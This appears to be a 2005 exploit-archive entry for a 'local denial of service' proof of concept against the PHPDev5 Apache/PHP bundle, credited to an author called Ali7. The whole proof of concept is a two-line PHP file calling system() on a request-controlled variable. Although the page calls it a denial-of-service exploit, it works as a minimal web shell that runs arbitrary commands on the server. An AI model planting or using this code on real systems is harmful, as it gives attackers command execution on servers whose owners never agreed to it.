[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpDEV5 System-Call Local Denial of Service Exploit
# Published : 2005-03-17
# Author : Ali7
# Previous Title : MailEnable 1.8 Remote Format String Denial of Service Exploit
# Next Title : GoodTech Telnet Server < 5.0.7 Buffer Overflow Crash Exploit
------------------------------------------------------------------------
# PHPDev5 <== Apache Server Local Denial-of-Service PoC
# By : Ali7
# e-mail : ali7@hotmail.co.uk
# date : 16-03-2k5
# greetz : our group :P
>Target : PHPDev 5
>URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/
>Type : PHP/Apache/MySQL Server..
..
>>PoC Sample :
Save this code as .php or .php3 file..
//start
<?
system($Ali7);
?>
//end
# www.Syue.com [2005-03-17]